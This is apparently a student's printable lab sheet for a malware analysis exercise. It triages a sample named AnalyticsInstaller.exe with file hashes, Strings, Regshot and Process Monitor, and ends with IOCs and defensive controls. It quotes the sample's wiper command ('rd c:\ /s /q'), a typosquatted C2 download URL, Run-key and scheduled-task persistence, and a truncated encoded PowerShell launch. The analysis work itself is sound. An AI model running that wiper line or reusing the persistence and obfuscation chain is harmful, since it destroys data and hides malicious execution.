Skip to main content
← Back to lab
SEC504 - Hacker Tools, Techniques, and Incident Handling | Printable command sheet
Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe

Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe

Malware Analysis | SEC504 | May 2026

Triaged AnalyticsInstaller.exe with a static-then-dynamic workflow: hashed it with Get-FileHash (SHA256 D501EF28...), ran Sysinternals Strings to surface IOCs (www1-google-analytics.com:8088/analytics.exe, an HKCU Run key, a base64 -EncodedCommand PowerShell payload, and a destructive AnalyticsBackup.bat containing 'cmd.exe /c rd c:\ /s /q'), then detonated it under Regshot and Process Monitor. The Regshot diff caught a new Schedule\TaskCache\Tree\Analytics Backup key, Get-ScheduledTask confirmed the 'Analytics Backup' task, and Procmon's process tree showed the installer spawning cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand.

Tools: PowerShell, Get-FileHash, Sysinternals Strings, Regshot, Process Monitor (Procmon), Get-ScheduledTask

Commands

1. Hash the sample

Started with the cheapest, safest evidence: a file hash. Get-FileHash produced an MD5 (5524BDF546472FD66D3450C39CC4E2E5) and SHA256 (D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45) of AnalyticsInstaller.exe. A hash is the single most portable IOC, ready to drop into VirusTotal, an EDR block list, or a SIEM watchlist before the binary is ever executed.

Get-FileHash -Algorithm MD5 AnalyticsInstaller.exe
Get-FileHash -Algorithm SHA256 AnalyticsInstaller.exe
-Algorithm MD5/SHA256: choose the digest Default output: Algorithm, Hash, Path

2. Pull readable strings

Ran Sysinternals Strings (strings.exe -n 10) to dump ASCII and Unicode sequences of 10+ characters from the binary. Even without unpacking, the printable strings leaked the malware's intent in plain text: a C2 URL, a persistence path, and a base64 PowerShell blob.

C:\tools\Sysinternals\strings.exe -n 10 .\AnalyticsInstaller.exe
-n 10: minimum string length of 10 to cut noise Strings dumps both ANSI and Unicode by default

3. Read the IOCs from the strings

The strings output was a confession. http://www1-google-analytics.com:8088/analytics.exe (a Google Analytics typosquat C2, the same disguise pattern seen in the RITA lab), C:\Windows\System32\analytics.exe (drop path), Software\Microsoft\Windows\CurrentVersion\Run with an 'Analytics Client' value (Run-key persistence), C:\Windows\System32\AnalyticsBackup.bat, a long powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABt... blob, and cmd.exe /c start /max http://www.midnitemeerkats.com/note. Imported API names (RegOpenKeyExW, RegSetValueExW, RegCloseKey from ADVAPI32) confirmed the binary writes the registry itself.

4. Regshot first shot

Switched to dynamic analysis. Regshot takes a full snapshot of the registry (and optionally the filesystem) so changes can be diffed after detonation. Configured it to scan C:\WINDOWS, output to the user profile, then captured the '1st shot' baseline: 395,525 keys and 676,926 values.

5. Detonate and confirm the scheduled task

Ran AnalyticsInstaller.exe in the isolated VM, then immediately checked for a dropped scheduled task with Get-ScheduledTask. A new task appeared: TaskName 'Analytics Backup', State Ready. Scheduled tasks are a top-tier persistence and execution mechanism precisely because they survive reboots and run on a trigger.

.\AnalyticsInstaller.exe
Get-ScheduledTask

6. Regshot second shot

Took the Regshot '2nd shot' after detonation (67,014 keys / 77,922 values in the changed scope) so Regshot could diff the two snapshots. The before/after diff is what turns 'something changed' into a precise list of exactly which keys and values the malware touched.

7. Compare the snapshots

Ran the Regshot comparison. The engine walked both snapshots and produced a diff report while the green progress bar ran. Comparing 395K-key baselines against the post-detonation state is exactly the kind of mechanical, high-coverage work that a human could never do by eye.

8. Read the Regshot diff report

Opened the ~res-x64.txt diff. Keys added: 7, including the smoking gun HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup, alongside the matching Plain and Tasks TaskCache GUID entries. This is the registry footprint of the 'Analytics Backup' scheduled task confirmed independently of Get-ScheduledTask, plus the deleted keys/values from normal Windows churn (WER TermReason entries) that a responder learns to ignore.

9. Read the dropped batch payload

Used Get-Content to read the dropped C:\Windows\SysWOW64\AnalyticsBackup.bat. Its entire contents: cmd.exe /c rd c:\ /s /q. That is a destructive wiper: a recursive, quiet, force delete of the C: drive. Naming a drive-wipe 'AnalyticsBackup' and scheduling it as 'Analytics Backup' is deliberate camouflage so a skimming defender reads 'backup' and moves on.

Get-Content C:\Windows\SysWOW64\AnalyticsBackup.bat

10. Filter Process Monitor

Launched Sysinternals Process Monitor and set a filter: Process Name is AnalyticsInstaller.exe → Include, with the usual analysis-tool noise (Procmon, Procexp, Autoruns, System) excluded. Filtering before detonation keeps the capture focused on the malware's own activity instead of the thousands of events Windows generates per second.

11. Re-detonate under Procmon

Re-ran AnalyticsInstaller.exe with Process Monitor capturing. The filtered event stream records every file, registry, process, and network operation the binary performs, in order, with full detail.

.\AnalyticsInstaller.exe

12. Find the Process Create event

Used Procmon's Find (Ctrl+F) for 'Process Create' to jump straight to the moment the malware spawned a child process, skipping past the file and registry operations to the execution event that matters most.

13. Read the encoded PowerShell command line

The Process Create event properties revealed the child: C:\WINDOWS\SysWOW64\cmd.exe launching cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand AEkAZgBHAG8... The -EncodedCommand flag takes base64 so the real script never appears in plaintext on the command line, and -ExecutionPolicy Bypass sidesteps script restrictions. This is the runtime confirmation of the encoded blob seen statically in the strings.

14. Reconstruct the process tree

Opened Procmon's Process Tree to see the full lineage: AnalyticsInstaller.exe (PID 5804), launched by powershell.exe under Explorer, started and exited within ~21 seconds. The tree ties the binary, its parent shell, and its short-lived execution window together into one picture, which is exactly what an IR timeline needs.

Key Findings

  • SHA256 D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45 (MD5 5524BDF546472FD66D3450C39CC4E2E5)
  • C2 / payload URL: http://www1-google-analytics.com:8088/analytics.exe (Google Analytics typosquat)
  • Persistence: HKCU/HKLM ...\CurrentVersion\Run 'Analytics Client' and a 'Analytics Backup' scheduled task
  • Dropped wiper: AnalyticsBackup.bat containing cmd.exe /c rd c:\ /s /q
  • Runtime: AnalyticsInstaller.exe → cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand

Security Controls

  • Application control / WDAC to block unsigned binaries from user-writable paths
  • PowerShell script-block logging and transcription to capture decoded -EncodedCommand content
  • Scheduled-task and Run-key baselining with alerting on new entries
  • EDR detonation/behavioral detection for cmd.exe → powershell.exe -EncodedCommand chains
  • Egress filtering and DNS monitoring for typosquatted analytics domains
  • Tamper-resistant, offline backups to survive a destructive 'rd c:\ /s /q' payload
Lab Print Sheet | Luis Javier Lozoya